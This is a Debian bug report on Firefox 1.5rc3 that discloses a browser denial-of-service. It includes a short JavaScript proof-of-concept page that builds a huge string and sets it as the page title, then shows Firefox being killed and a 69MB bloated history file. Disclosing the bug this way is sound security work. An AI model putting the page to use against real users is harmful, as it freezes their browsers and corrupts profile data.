Package: firefox Version: 1.4.99+1.5rc3.dfsg-2 Severity: grave Tags: security Justification: causes non-serious data loss
http://packetstormsecurity.org/0512-exploits/firefox-1.5-buffer-overflow.txt My ff does not crashed, but it ate really much cpu-time when I tested slightly modified version of javascript. An example: <html><head><title>heh</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "abcdefg"; } var buffer2 = buffer; for (i = 0; i < 500; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html> And results: [EMAIL PROTECTED] ~] time firefox Killed real 38m3.425s user 24m17.871s sys 9m31.933s [EMAIL PROTECTED] ~] cd .mozilla/firefox/5p0odewe.default/ [EMAIL PROTECTED] 5p0odewe.default] ls -lh history.dat -rw-r--r-- 1 rekcahx rekcahx 69M Dec 8 15:24 history.dat [EMAIL PROTECTED] 5p0odewe.default] grep http history.dat |wc -l 1 [EMAIL PROTECTED] 5p0odewe.default] wc -l history.dat 876764 history.dat I removed history.dat and ff started up normally. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.11.2-aino Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages firefox depends on: ii debianutils 2.15.1 Miscellaneous utilities specific t ii fontconfig 2.3.2-1.1 generic font configuration library ii libatk1.0-0 1.10.3-1 The ATK accessibility toolkit hi libc6 2.3.5-6 GNU C Library: Shared libraries an ii libcairo2 1.0.2-3 The Cairo 2D vector graphics libra ii libfontconfig1 2.3.2-1.1 generic font configuration library ii libfreetype6 2.1.10-1 FreeType 2 font engine, shared lib ii libgcc1 1:4.0.2-5 GCC support library ii libglib2.0-0 2.8.4-2 The GLib library of C routines ii libgtk2.0-0 2.6.10-2 The GTK+ graphical user interface ii libidl0 0.8.5-1 library for parsing CORBA IDL file ii libjpeg62 6b-10 The Independent JPEG Group's JPEG ii libpango1.0-0 1.8.2-3 Layout and rendering of internatio ii libpng12-0 1.2.8rel-5 PNG library - runtime ii libstdc++6 4.0.2-5 The GNU Standard C++ Library v3 ii libx11-6 6.8.2.dfsg.1-11 X Window System protocol client li ii libxext6 6.8.2.dfsg.1-11 X Window System miscellaneous exte ii libxft2 2.1.7-1 FreeType-based font drawing librar ii libxinerama1 6.8.2.dfsg.1-11 X Window System multi-head display ii libxp6 6.8.2.dfsg.1-11 X Window System printing extension ii libxt6 6.8.2.dfsg.1-11 X Toolkit Intrinsics ii psmisc 21.8-1 Utilities that use the proc filesy ii xlibs 6.8.2.dfsg.1-11 X Window System client libraries m ii zlib1g 1:1.2.3-8 compression library - runtime firefox recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
